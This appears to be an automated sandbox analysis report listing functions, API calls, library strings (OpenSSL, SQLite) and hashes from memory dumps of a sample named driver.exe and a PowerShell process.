API String ID: 3535234312-384499812
Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction ID: f7cae5e61294facad540732b8d8fdf0bd5f9573e3f430214f7eb307cc3398514
Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction Fuzzy Hash: 5CD14922A0AB82A6EF589F25D4902BD27A4FB44BC4F489035CE4D4B7D5DF38E560C738

Function 00007FF8A8042126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A806F76D

Strings

ssl_get_prev_session, xrefs: 00007FF8A806F732, 00007FF8A806F7D4, 00007FF8A806F884
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A806F73E, 00007FF8A806F7E0, 00007FF8A806F890

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
API String ID: 3535234312-1331951588
Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction ID: b2a58200ee444fe451f96ab451b0045fd4e1f60f97c70cd727bc1e68b9bd28b3
Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction Fuzzy Hash: F6C19A22B0A682A6EE64DA25D5507B963A0FF84BC8F044431EE4D477E6CF7CE461C728

Function 00007FF8A869CEE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A869D170

Strings

variable number must be between ?1 and ?%d, xrefs: 00007FF8A869D086
too many SQL variables, xrefs: 00007FF8A869D192

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 22509725-515162456
Opcode ID: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
Instruction ID: 26c33d82a1250cd60859bb872e640de3f44f3351dd638f96b98fbe0fa5619dd3
Opcode Fuzzy Hash: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
Instruction Fuzzy Hash: 9A818B72A0AA52E5FB94DF01E448AB97BA5FB54BC4F45A036DA4C472C4EF3CE541C328

Function 00007FF8A86BA930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86BA9DD

Strings

BINARY, xrefs: 00007FF8A86BA93C
no such collation sequence: %s, xrefs: 00007FF8A86BAB7C

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: BINARY$no such collation sequence: %s
API String ID: 22509725-2451720372
Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction ID: afef17b140fcbadbe5fac42bab210e3a3b6ece6a1c100f546e8ddabefcfd91e7
Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction Fuzzy Hash: 9071BF22A5AA42A5FB189F21854C3B97391EB54BE9F486331DE6C072C5DF3CE191C364

Function 00007FF8A86B9A40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FF8A86B9A92

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction ID: a2c4c380a6d8d4946ceae1a0768ead2bb6db633b87029fbbd3a3b018b16c06b9
Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction Fuzzy Hash: 6371CE32B0A655ADFB108B65D4486BD3BB1FB48B9CF042635DE2E57B88EF389441C724

Function 00007FF8A8654A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8654BCC

Strings

%02d, xrefs: 00007FF8A8654B6E, 00007FF8A8654BD5

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %02d
API String ID: 22509725-896308400
Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction ID: 64318e9f2f41998bdcec4c39816b83a5e8bbcf6add06636e52d6ce58bc23ba0c
Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction Fuzzy Hash: 7A71BF32A1A692A5F728CF68E4487FD7760FB94788F106031EE8D17A49DF39E485CB14

Function 00007FF8A8041EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8049154

Strings

ssl_ctx_make_profiles, xrefs: 00007FF8A804907F, 00007FF8A804917A
..\s\ssl\d1_srtp.c, xrefs: 00007FF8A804908B, 00007FF8A8049183

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
API String ID: 800424832-118859582
Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction ID: 09e7eedb99335f23bd2d44e540d38fa6ce4b9e6bd624df30c20ff0c6e468ac3b
Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction Fuzzy Hash: 8751F721F4F6426AFF109B1598053BA9691EF44BD4F588031DE0E4B7E6DF3CE8628728

Function 00007FF6A29D5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29D17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D1803

_get_daylight.LIBCMT ref: 00007FF6A29D5CA4
_get_daylight.LIBCMT ref: 00007FF6A29D5CB5

Strings

?, xrefs: 00007FF6A29D5C35

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 8f0ca59b1b4c8bdb8dcc6cf619dedc6a632142d022b155d49dff1be3c8e0507e
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: DD413912A4A28247FB249B27D44137A66E0EF90FACF144235EE5C86AD7DFBCD441E700

Function 00007FF6A29C9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C90B6

Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A29BCC15), ref: 00007FF6A29C90D4

Strings

C:\Users\user\Desktop\driver.exe, xrefs: 00007FF6A29C90C2

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\driver.exe
API String ID: 3580290477-2459203064
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: 9db338936b69dce85dddd4cdc65443c6794ef8bd36d3b9f2a2aabfeef0e3c6fd
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 9E41A032A4AB428AF758DF27E5811BD6794EF49FD8B454035E94E83B86CEBCF4819300

Function 00007FF6A29CCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6A29CCDBF
GetLastError.KERNEL32 ref: 00007FF6A29CCDE1

Strings

U, xrefs: 00007FF6A29CCD6B

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 5f470999ecf937b06abc2f2cdefb3448ada16cd907757714173054491b27a582
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 4841C732B19A4185DB208F26E4443AA6BA0FB98F98F444035EE4DC7B99DF7CE401D740

Function 00007FF8A806DBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SSL_SESSION_new, xrefs: 00007FF8A806DBED, 00007FF8A806DCA7
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A806DBCF, 00007FF8A806DBF9, 00007FF8A806DCB3, 00007FF8A806DD03

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
API String ID: 0-402823876
Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction ID: 2276b63529f78fd06fd61d990d5af0f38b5f83961d5a00a7408c169c364b05bc
Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction Fuzzy Hash: 0231C220A0AA8266FF04AB25D8553E95681EF48BD4F884135DE0C4B7C7EF3CD1618B28

Function 00007FF8A80480D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FF8A804811D
SystemTimeToFileTime.KERNEL32 ref: 00007FF8A804812D

Strings

gfff, xrefs: 00007FF8A804815F

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction ID: 7a027d970d9e0cafb761c8d32bda368038f4dd1b92b91aa04c4c708cd36ebbbb
Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction Fuzzy Hash: 64212772A1564699DF90CF29D40037A76E4EB88BC4F448036DA5E873A4DF3CD1608710

Function 00007FF6A29CF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6A29CF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6A29CF6BA

Strings

:, xrefs: 00007FF6A29CF67E

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: a416c895f446f28496a71d9840456b4e57741596a3721b176f5b637dddf89f80
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 3321E432A4928586FB24AB12D05426D73B1FB84F8CF954036DA8D83696DFFCE9459B40

Function 00007FF6A29BFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6A29BFE08
RaiseException.KERNEL32 ref: 00007FF6A29BFE49

Strings

csm, xrefs: 00007FF6A29BFE36

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 35c87853e0add64c2fb32127df40c301b7cb301cf980b52a70198180d7b8e47e
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 27115E32609B8182EB208F16F44026977E1FB88F88F584234EB8D87B56DF7CD5519B00

Function 00007FF6A29D07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D07DC
GetDriveTypeW.KERNEL32 ref: 00007FF6A29D081C

Strings

:, xrefs: 00007FF6A29D0805

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 8c670cf2ca3cfcf05c6d961dac0df574b98f2fd56279d5e767f6498557b10572
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 7F018422A5E20786F7209F62986627E27E0EF44F0CF801035D94DC6A97DFACE504AA14

Function 00007FF8A8048B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FF8A80483B4), ref: 00007FF8A8048B36
SystemTimeToFileTime.KERNEL32(?,00007FF8A80483B4), ref: 00007FF8A8048B46

Strings

gfff, xrefs: 00007FF8A8048B7A

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: a5c736eb7f7d934903c4acd511603668516961c67b7fca4abe00a96c3b3beb78
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: 3601A7A2B1594582DF509B25F8011956790EBDC7C4F449032E68DC6795EE3CD6118710

Analysis Process: powershell.exePID: 5652, Parent PID: 6520COMMON

Executed Functions

Function 00007FF846144550 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

8G9F, xrefs: 00007FF8461445CD

Memory Dump Source

Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd

Similarity

API ID:
String ID: 8G9F
API String ID: 0-4030070024
Opcode ID: 9b9865d8c88c16aabf23828a7571539a0dc2e03dd3f0c8cdad3b333cfa3c2a1a
Instruction ID: 784b2ace288b4a57de689768b8e056820d1f98ff2e35474d73d155db29f3c1da
Opcode Fuzzy Hash: 9b9865d8c88c16aabf23828a7571539a0dc2e03dd3f0c8cdad3b333cfa3c2a1a
Instruction Fuzzy Hash: 1E410932E0DB898FEBA5EB2C64115B4B7D1FF457A4F0901BAC04DCB187EA18AC05CB81

Function 00007FF84614459C Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

8G9F, xrefs: 00007FF8461445CD

Memory Dump Source

Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd

Similarity

API ID:
String ID: 8G9F
API String ID: 0-4030070024
Opcode ID: 642f1549dc4751e7fe58720763946cd7e2601a86074024aaa4af1ce39cd620a4
Instruction ID: d7042c24edb7673f967f95cd9d28c47678e48969e56929437c7e6da27aa6d90a
